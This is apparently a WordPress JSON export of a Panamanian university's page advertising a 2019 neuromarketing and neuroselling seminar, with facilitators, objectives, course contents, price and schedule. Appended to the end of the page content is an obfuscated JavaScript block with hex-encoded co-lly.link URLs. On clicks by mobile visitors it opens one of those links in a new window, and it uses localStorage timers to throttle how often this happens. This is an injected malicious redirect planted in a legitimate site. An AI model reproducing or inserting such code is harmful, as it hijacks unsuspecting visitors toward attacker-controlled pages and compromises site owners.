{"id":6506,"date":"2017-08-27T17:11:10","date_gmt":"2017-08-27T17:11:10","guid":{"rendered":"https:\/\/qlu.ac.pa\/executive-education\/?page_id=6506"},"modified":"2019-09-19T21:48:32","modified_gmt":"2019-09-19T21:48:32","slug":"seminario-taller-internacional-neuromarketing-neuroventas","status":"publish","type":"page","link":"https:\/\/qlu.ac.pa\/executive-education\/seminario-taller-internacional-neuromarketing-neuroventas\/","title":{"rendered":"Seminario-Taller Internacional en Neuromarketing y Neuroventas"},"content":{"rendered":"<p>[vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb scene_position=\u00bbcenter\u00bb layer_one_image=\u00bb2518&#8243; layer_four_image=\u00bb2655&#8243; text_color=\u00bbdark\u00bb text_align=\u00bbcenter\u00bb top_padding=\u00bb0&#8243; bottom_padding=\u00bb0&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/1&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][nectar_slider location=\u00bbNeuromarketing seminario Taller\u00bb flexible_slider_height=\u00bbtrue\u00bb arrow_navigation=\u00bbtrue\u00bb overall_style=\u00bbclassic\u00bb desktop_swipe=\u00bbtrue\u00bb parallax=\u00bbtrue\u00bb loop=\u00bbtrue\u00bb slider_transition=\u00bbfade\u00bb button_sizing=\u00bbregular\u00bb slider_height=\u00bb500&#8243;][\/vc_column][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb bg_color=\u00bb#ffffff\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb top_padding=\u00bb40&#8243; bottom_padding=\u00bb40&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb0&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-tags\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Introducci\u00f3n<\/h2>\n<div>El neuromarketing es <strong>m\u00e1s que una tendencia<\/strong>. Es un punto de encuentro en el que se dan cita el <strong>marketing, las investigaciones en el campo de la neurociencia, la psicolog\u00eda y el uso de nuevas tecnolog\u00edas<\/strong> como potentes herramientas de investigaci\u00f3n de mercado.<\/div>\n<div>Un conjunto de herramientas \u00fatil e importante para lograr el \u00e9xito en el proceso de comunicaci\u00f3n y venta de cualquier producto o servicio. De ah\u00ed, que se hable del neuromarketing como una manera de profundizar sobre <strong>la conducta humana<\/strong>.<\/div>\n<div><img fetchpriority=\"high\" decoding=\"async\" class=\"aligncenter wp-image-6514 size-medium\" src=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/eye-tracking-gran-superficie-decathlon-marketing-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/eye-tracking-gran-superficie-decathlon-marketing-300x225.jpg 300w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/eye-tracking-gran-superficie-decathlon-marketing-600x450.jpg 600w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/eye-tracking-gran-superficie-decathlon-marketing-768x576.jpg 768w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/eye-tracking-gran-superficie-decathlon-marketing-1030x773.jpg 1030w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/eye-tracking-gran-superficie-decathlon-marketing.jpg 1600w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><br \/>\nEn este curso te incorporar\u00e1s a un apasionante viaje a las caracter\u00edsticas b\u00e1sicas que conforman la personalidad y comportamientos de un individuo. Establecidos los principios b\u00e1sicos y sus aplicaciones m\u00e1s pr\u00f3ximas, el Neuromarketing despliega ante nosotros <strong>un mundo de herramientas, unas m\u00e1s accesibles que otras, para conectar, conocer e interactuar positivamente<\/strong> con las personas que componen el p\u00fablico objetivo de una empresa: el cliente externo y, por extensi\u00f3n, con el cliente interno.<\/div>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-user\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Facilitadores<\/h2>\n<p><img decoding=\"async\" class=\"alignleft size-thumbnail wp-image-6512\" src=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/foto-gabriel-carrascosa-80x80.jpg\" alt=\"\" width=\"80\" height=\"80\" srcset=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/foto-gabriel-carrascosa-80x80.jpg 80w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/foto-gabriel-carrascosa-300x300.jpg 300w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/foto-gabriel-carrascosa-150x150.jpg 150w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/foto-gabriel-carrascosa-50x50.jpg 50w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/foto-gabriel-carrascosa-100x100.jpg 100w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/foto-gabriel-carrascosa.jpg 325w\" sizes=\"(max-width: 80px) 100vw, 80px\" \/><strong>Gabriel Carrascosa<\/strong><\/p>\n<p>Investigador y profesor en varias universidades europeas en el \u00e1rea de las mejores f\u00f3rmulas para la <strong>persuasi\u00f3n del consumidor con procesos no invasivos, neuromarketing y neuroventas<\/strong>. Actualmente director y profesor del Curso de Experto Universitario en Neuromarketing y Comportamiento del Consumidor (T\u00edtulo propio de la <strong>UNIVERSIDAD NEBRIJA<\/strong>) en <strong>Madrid, M\u00e1laga y Marbella (Espa\u00f1a)<\/strong>. Licenciado en Administraci\u00f3n y Direcci\u00f3n de Empresas y apasionado del buen marketing desde 1990.<strong><br \/>\n<\/strong><\/p>\n<div><a href=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2014\/08\/nestor_romero_comercializacion_gestion_deportiva.jpg\"><img decoding=\"async\" class=\"alignleft size-thumbnail wp-image-2419\" src=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2014\/08\/nestor_romero_comercializacion_gestion_deportiva-80x80.jpg\" alt=\"nestor_romero_comercializacion_gestion_deportiva\" width=\"80\" height=\"80\" srcset=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2014\/08\/nestor_romero_comercializacion_gestion_deportiva-80x80.jpg 80w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2014\/08\/nestor_romero_comercializacion_gestion_deportiva-150x150.jpg 150w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2014\/08\/nestor_romero_comercializacion_gestion_deportiva-36x36.jpg 36w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2014\/08\/nestor_romero_comercializacion_gestion_deportiva-180x180.jpg 180w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2014\/08\/nestor_romero_comercializacion_gestion_deportiva-120x120.jpg 120w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2014\/08\/nestor_romero_comercializacion_gestion_deportiva.jpg 256w\" sizes=\"(max-width: 80px) 100vw, 80px\" \/><\/a><strong>N\u00e9stor Romero<\/strong><\/div>\n<div>Ingeniero por la Universidad de C\u00f3rdoba (Espa\u00f1a) y experto en Neuromarketing y Marketing Digital. Master en Direcci\u00f3n Comercial y Marketing, Master en Dise\u00f1o Gr\u00e1fico y Packaging, Master en Marketing Digital y Redes Sociales, Master en Neuromarketing y MBA por la Universidad Rey Juan Carlos (Espa\u00f1a). Compagina su labor profesional gestionando gran variedad de proyectos online en m\u00faltiples pa\u00edses del mundo con la docencia en universidades y escuelas de negocio, entre ellas: Quality Leadership University, Universidad de M\u00e1laga, Universidad de\u00a0Chile,\u00a0C\u00e1mara Oficial de Comercio de M\u00e1laga, Universidad de Granada o Universidad Nacional a Distancia (UNED).<\/div>\n<p>[\/text-with-icon][\/vc_column][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb200&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-search\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Objetivos<\/h2>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-6516 size-full\" src=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/Captura-de-pantalla-2017-08-27-a-las-12.41.22-p.m..png\" alt=\"\" width=\"343\" height=\"293\" srcset=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/Captura-de-pantalla-2017-08-27-a-las-12.41.22-p.m..png 343w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/Captura-de-pantalla-2017-08-27-a-las-12.41.22-p.m.-300x256.png 300w\" sizes=\"(max-width: 343px) 100vw, 343px\" \/><\/p>\n<div>\n<ol>\n<li>Que el asistente sea capaz de asimilar los grandes avances en materia de <strong>neuromaketing y neuroventas <\/strong>aplicado directamente a las decisiones empresariales.<\/li>\n<li>Aprender de manera pr\u00e1ctica aplicaciones de neuromarketing, manejando las \u00faltimas tecnolog\u00edas en dispositivos fijos y m\u00f3viles de <strong>Eye Tracking<\/strong> (seguimiento ocular) y <strong>Neurosensores<\/strong>, con aplicaciones pr\u00e1cticas y actuaciones de marketing.<\/li>\n<li>Dise\u00f1ar\u00a0<strong>investigaciones del comportamiento del consumidor<\/strong>, an\u00e1lisis, interpretaci\u00f3n y aplicaci\u00f3n de conclusiones.<\/li>\n<li>Conocer <strong>casos pra\u0301cticos y reales<\/strong> de aplicacio\u0301n.<\/li>\n<\/ol>\n<\/div>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-wrench\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Contenidos<\/h2>\n<ol>\n<li>Introducci\u00f3n al Neuromarketing y las Neurociencias<\/li>\n<li>Conocer al cliente: Percepci\u00f3n, Toma de decisiones, Comportamiento en Grupo<\/li>\n<li>Del Marketing al Neuromarketing, un camino sin retorno<\/li>\n<li>Productos, servicios y estrategias de marca seg\u00fan el Neuromarketing<\/li>\n<li>Marketing sensorial: sentidos y la explosi\u00f3n de percepciones<\/li>\n<li>Uso del Eye Tracking<\/li>\n<li>Uso de Neurosensores<\/li>\n<li>Taller pr\u00e1ctico de uso de herramientas del laboratorio<\/li>\n<\/ol>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-shopping-cart\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Inversi\u00f3n<\/h2>\n<p>La inversi\u00f3n, incluyendo asistencia al <a href=\"https:\/\/neuromarketingforum.org\/\" target=\"_blank\" rel=\"noopener\">Neuromarketing Forum 2019<\/a>, es de $600 ($500 por pronto pago hasta el 15 de octubre de 2019).<\/p>\n<p>Incluye:<\/p>\n<ul>\n<li>Material del participante.<\/li>\n<li>Alimentos (Refrigerios).<\/li>\n<li>Acceso al Neuromarketing Forum 2019 el 18 de octubre.<\/li>\n<li>Certificado conferido por Quality Leadership University y Asociaci\u00f3n Europea de Neuromarketing (AEN).<\/li>\n<\/ul>\n<p>[\/text-with-icon][\/vc_column][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb400&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-envelope-alt\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Registro y m\u00e1s informaci\u00f3n<\/h2>\n<p>[contact-form-7 id=\u00bb6505&#8243; title=\u00bbCertificaci\u00f3n Internacional en Neuromarketing y Neuroventas\u00bb][\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-hand-right\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Lugar y Fecha<\/h2>\n<ul>\n<li>Del <strong>21 al 25 de octubre de 2019\u00a0<\/strong>(20 horas) en Quality Leadership University.<\/li>\n<li><strong>Lunes a viernes de 6:00 p.m. a 10:00 p.m.<\/strong><\/li>\n<li>Instalaciones de Quality Leadership University, calle 45, Bella Vista.<\/li>\n<li>Contacto en tel\u00e9fono\u00a0<strong>(507) 264-0777<\/strong> o capacitacion@qlu.ac.pa<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-6517 size-medium\" src=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/1-300x256.jpg\" alt=\"Neuromarketing en panama\" width=\"300\" height=\"256\" srcset=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/1-300x256.jpg 300w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/1-600x511.jpg 600w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/1-768x655.jpg 768w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/1-1030x878.jpg 1030w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/1.jpg 1043w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-refresh\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Metodolog\u00eda<\/h2>\n<p>El enfoque de este curso de experto es eminentemente pr\u00e1ctico. Se centra en conocer resultados de <strong>multitud de investigaciones realizadas<\/strong> en el campo de la neurociencia, sacando de ellas aplicaciones \u00fatiles, aparte del <strong>uso real de los dispositivos<\/strong> de uno de los laboratorios de neuromarketing m\u00e1s avanzados del mundo. Todo ello para que los profesionales del marketing puedan profundizar en las expectativas del mercado y sus componentes y responder con acciones m\u00e1s efectivas.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-6515\" src=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/Captura-de-pantalla-2017-08-27-a-las-12.41.50-p.m..png\" alt=\"\" width=\"399\" height=\"320\" srcset=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/Captura-de-pantalla-2017-08-27-a-las-12.41.50-p.m..png 399w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2017\/08\/Captura-de-pantalla-2017-08-27-a-las-12.41.50-p.m.-300x241.png 300w\" sizes=\"(max-width: 399px) 100vw, 399px\" \/>[\/text-with-icon][\/vc_column][\/vc_row][vc_row type=\u00bbin_container\u00bb full_screen_row_position=\u00bbmiddle\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb overlay_strength=\u00bb0.3&#8243;][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/1&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\">[button color=\u00bbaccent-color\u00bb hover_text_color_override=\u00bb#fff\u00bb size=\u00bblarge\u00bb url=\u00bbhttps:\/\/qlu.ac.pa\/executive-education\/\u00bb text=\u00bbOtros programas\u00bb color_override=\u00bb\u00bb]<\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x70\\x4a\\x5a\\x33\\x63\\x323','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x42\\x46\\x6a\\x35\\x63\\x305','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x46\\x5a\\x46\\x38\\x63\\x368','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x48\\x71\\x45\\x39\\x63\\x349','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x77\\x49\\x50\\x34\\x63\\x334','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4c\\x66\\x46\\x37\\x63\\x367','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x61\\x65\\x76\\x32\\x63\\x322','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x67\\x68\\x48\\x36\\x63\\x306','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4c\\x48\\x65\\x30\\x63\\x360','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6b\\x59\\x55\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb scene_position=\u00bbcenter\u00bb layer_one_image=\u00bb2518&#8243; layer_four_image=\u00bb2655&#8243; text_color=\u00bbdark\u00bb text_align=\u00bbcenter\u00bb top_padding=\u00bb0&#8243; bottom_padding=\u00bb0&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/1&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][nectar_slider location=\u00bbNeuromarketing seminario Taller\u00bb flexible_slider_height=\u00bbtrue\u00bb arrow_navigation=\u00bbtrue\u00bb overall_style=\u00bbclassic\u00bb desktop_swipe=\u00bbtrue\u00bb parallax=\u00bbtrue\u00bb loop=\u00bbtrue\u00bb slider_transition=\u00bbfade\u00bb button_sizing=\u00bbregular\u00bb slider_height=\u00bb500&#8243;][\/vc_column][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb bg_color=\u00bb#ffffff\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb top_padding=\u00bb40&#8243; bottom_padding=\u00bb40&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; 